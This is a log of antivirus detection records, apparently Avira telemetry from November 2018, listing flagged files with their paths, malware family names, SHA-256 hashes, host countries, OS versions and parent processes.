  Row(detection=Row(filename='cscript.exe', filepath='C:\\PROGRAM FILES\\OFFICE 2010 激活文件\\MINI-KMS 1.3 - 副本\\cscript.exe', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='e017ee012e152edbb8db49659c80ace711063322250e732996224c98bdd12016', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:49sueK368k+zChEF.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:47:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sujet concours inphb.exe', filepath='G:\\photo\\comptabilité\\SUJET CONCOURS INPHB.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:51:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ospprearm.exe', filepath='C:\\Windows.old.000\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE', filesize=92000, name='W32/Sality.AT.#M1.#R1'), hash='692c2963a14695f6eb91c8df765a1f678693b0030746a786ba5883a772d37fab', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T01:54:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111001-f369817c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111001-F369817C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222748-d926ca10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d9eac89\\AVSCAN-20181101-222733-D6192015\\AVSCAN-20181101-222748-D926CA10', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Documents and Settings\\X\\Dokumentumok\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:26:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110848-ea3ff004', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110848-EA3FF004', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123318-d19d5297', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123257-BFABBEE0\\AVSCAN-20181101-123318-D19D5297', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spic.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Justified\\spic.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120545-269d193e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_425e6008\\AVSCAN-20181101-120454-1F76822B\\AVSCAN-20181101-120545-269D193E', filesize=320000, name='TR/SPY.320000.6.#M1.#R1'), hash='d1166cbc7a2419c8c207cf4a60944bb73826a2a482f68a0e014a84591ad2d563', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T11:05:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111124-fdd94257', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111124-FDD94257', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.21720_none_75dc5a4092e0dcc7\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8b90e3e508cce54c4e83097a770130c2ca1eed46c0ba74ee84880654a00f48c5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:34:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110350-c48d8205', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110350-C48D8205', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4ba2a42940d17856606e26b2498af544ba89dcc1', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\4ba2a42940d17856606e26b2498af544ba89dcc1', filesize=2176000, name='HEUR/AGEN.1027093.#M1.#R1'), hash='98a8e3ffe96241b998cbb6b56422acb9a94c5fdf27a045e918a691891a19f9da', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-01T00:15:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='85c502f0cd2c224a2c99ee96bae85f09afb2443cc19e5defef72abde35b1dc87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\85C502F0CD2C224A2C99EE96BAE85F09AFB2443CC19E5DEFEF72ABDE35B1DC87', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='85c502f0cd2c224a2c99ee96bae85f09afb2443cc19e5defef72abde35b1dc87', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:30:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-032411-dbe6e6d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b9e5b6d\\AVSCAN-20181101-031321-89EC6A36\\AVSCAN-20181101-032411-DBE6E6D9', filesize=1212000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='7099b3ead18e31a00956c2e611edf9c52da535fb82ece0114bcc7457648ca007', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T02:24:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='19db880a0ac3f7a8dc75d7cdb88a02b5ca846e896bc92a1a68b5c1b72ee68205', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\19DB880A0AC3F7A8DC75D7CDB88A02B5CA846E896BC92A1A68B5C1B72EE68205', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='19db880a0ac3f7a8dc75d7cdb88a02b5ca846e896bc92a1a68b5c1b72ee68205', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:23:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T16:43:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T02:14:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\06C0KHEF\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115703-2d1e0e93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b3b19a18\\AVSCAN-20181101-115509-1EACD5CD\\AVSCAN-20181101-115703-2D1E0E93', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:57:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='D:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T09:05:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioc5db9c499-9ba3-c94e-a80d-680b4e7d2952.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\ioc5DB9C499-9BA3-C94E-A80D-680B4E7D2952.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T13:15:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nclcapability.dll', filepath='C:\\Program Files\\PC Connectivity Solution\\NclCapability.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='740f6e33079ceb6f9ada55bca991a2d506b4cd31801d354641eca5a6320d4266', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:48:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r415qzs', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R415QZS', filesize=64000, name='VBA/Dldr.Agent.kiiyx.#M1.#R1'), hash='2b52bafbcb238c2171b2ce7def37fb2c650333c507a3e5e3a911164120494a14', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-175732-d3921467', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57cbddd8\\AVSCAN-20181101-174945-9A9B0304\\AVSCAN-20181101-175732-D3921467', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:57:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='E:\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='E:\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:16:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181103-004055-a4e74fa7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0676114b\\AVSCAN-20181103-003701-827BAB03\\AVSCAN-20181103-004055-A4E74FA7', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:05:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000041a5', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000041a5', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:38:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:59:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:49:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180959-b4629b5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39003524\\AVSCAN-20181101-180713-9D2F990A\\AVSCAN-20181101-180959-B4629B5B', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:10:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:10:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145739-3bf4aa86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49d331c8\\AVSCAN-20181101-144926-FFC99672\\AVSCAN-20181101-145739-3BF4AA86', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='173c73902ae7d6e729f36b7cbda8103bf2d147fb3eed50b8142a52da0f7b5eed', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:57:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='locale.exe', filepath='G:\\دورة صيانة 2017\\imie tool\\IMEI CHANGER\\IMEI Write allwinner A10,A13\\AutoPlay\\Docs\\Dragonface-V10\\CPFOP\\bin\\locale.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='5c3e55ec0f42bffd09ad6d5cbf9f145cf306a66a7609c3498506420124e36bf3', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\mshta.exe', parentsize=13312, timestamp='2018-11-01T13:05:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094536-0bfa0faf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094536-0BFA0FAF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:45:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgE589A.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:47:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='esercizi publisher.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Esercizi Publisher.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsf860A.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T09:06:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ixmihhpw.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\IXmihhPw.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150459-c5c6402d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150459-C5C6402D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:05:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='--engine=2 --session-id=XIH\\\\\\/Go3BhU\\\\\\/csOp+6EmSL8+WIkDrmcGGyvZBQGEU --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.174.200\\software_reporter_tool.exe', parentsize=12184696, timestamp='2018-11-01T17:51:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172226-5c235541', filepath='\\\\?\\C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_73ccddd8\\AVSCAN-20181101-172204-57FD74D8\\AVSCAN-20181101-172226-5C235541', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:22:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgE48D2.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:35:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151028-04bd2a23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151028-04BD2A23', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aapt.exe', filepath='K:\\TAB\\Lenovo_S660\\Lenovo_S660_ROW_S029_140228_(by_xdafirmware.com)\\Lenovo_S660_ROW_S029_140228\\SN Write Tool v2.1444.00\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='df8aa8d28272927ae746bff858ad90e889e527c1f0a1d8e75aa60b723d3be8f2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T12:47:53Z'), dt=datetime.date(2018, 11, 1)),
